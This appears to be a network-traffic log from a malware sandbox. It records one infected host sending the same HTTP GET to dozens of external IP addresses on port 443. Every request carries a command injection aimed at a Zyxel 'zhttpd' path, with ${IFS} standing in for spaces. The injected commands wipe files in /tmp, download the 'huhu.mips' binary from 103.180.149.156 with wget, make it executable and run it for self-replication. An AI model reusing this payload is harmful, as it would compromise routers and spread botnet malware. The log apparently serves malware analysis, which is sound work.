                                                        Feb 2, 2024 06:21:05.857436895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3476192.168.2.1458932117.18.208.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857472897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3477192.168.2.1439904219.193.107.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857496023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3478192.168.2.1437402190.184.249.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857536077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3479192.168.2.1450836207.101.78.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857563972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3480192.168.2.143950439.42.142.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857611895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3481192.168.2.144213224.213.199.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857656956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3482192.168.2.1446434164.137.221.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857671022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3483192.168.2.143978865.16.205.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857703924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3484192.168.2.1440322122.51.152.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857749939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3485192.168.2.1444078187.46.181.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857772112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3486192.168.2.144648857.219.33.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857811928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3487192.168.2.1443806146.130.192.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857858896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3488192.168.2.145989098.217.102.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857898951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3489192.168.2.1453698189.48.126.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857928991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3490192.168.2.1438808217.148.111.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.857973099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3491192.168.2.1460176159.95.10.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858002901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3492192.168.2.143700891.198.139.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858057976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3493192.168.2.145106447.183.84.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858109951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3494192.168.2.1451750121.106.153.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858164072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3495192.168.2.146083642.12.175.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858217001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3496192.168.2.1459166140.43.126.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858246088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3497192.168.2.1458522109.6.253.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858306885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3498192.168.2.1442454147.142.238.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858344078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3499192.168.2.1446030201.196.52.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858395100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3500192.168.2.1435512117.67.151.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858413935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3501192.168.2.1442396207.151.88.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858441114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3502192.168.2.144802293.109.140.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858469963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3503192.168.2.1439148183.122.27.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858513117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3504192.168.2.143920427.56.122.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858540058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3505192.168.2.143290082.42.3.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858577013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3506192.168.2.1438994119.222.17.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858618975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3507192.168.2.144615634.128.142.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858649969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3508192.168.2.1444552115.188.214.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858680010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3509192.168.2.144622488.18.40.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858715057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3510192.168.2.143542218.240.82.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858772993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3511192.168.2.1459090133.2.77.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858804941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3512192.168.2.1456366119.247.227.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858829021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3513192.168.2.143593648.197.231.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858875990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3514192.168.2.1444162105.192.246.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858906984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3515192.168.2.1444570104.243.41.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858952999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3516192.168.2.1448832186.99.35.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.858993053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3517192.168.2.145658476.236.60.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859026909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3518192.168.2.1453248155.53.242.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859062910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3519192.168.2.144515492.159.47.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859095097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3520192.168.2.1451062220.89.150.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859119892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3521192.168.2.1450338145.16.15.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859174967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3522192.168.2.1444894162.223.180.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859196901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3523192.168.2.145268495.39.211.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859237909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3524192.168.2.145975062.198.184.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859289885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3525192.168.2.144205499.95.201.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859328985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3526192.168.2.1434646114.142.163.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859358072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3527192.168.2.1435430144.205.100.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859384060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3528192.168.2.1440898142.127.20.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859473944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3529192.168.2.1437838149.178.87.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859488010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3530192.168.2.1446884113.113.132.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859530926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3531192.168.2.145215677.229.151.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859558105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3532192.168.2.144702420.150.169.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859608889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3533192.168.2.1442726144.39.94.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859631062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3534192.168.2.1447022105.109.240.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859690905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3535192.168.2.144372278.164.67.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859734058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3536192.168.2.1450432218.131.114.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859782934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3537192.168.2.1456636212.75.78.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.859797955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3538192.168.2.1447650123.208.159.204443
                                                        TimestampBytes transferredDirectionData
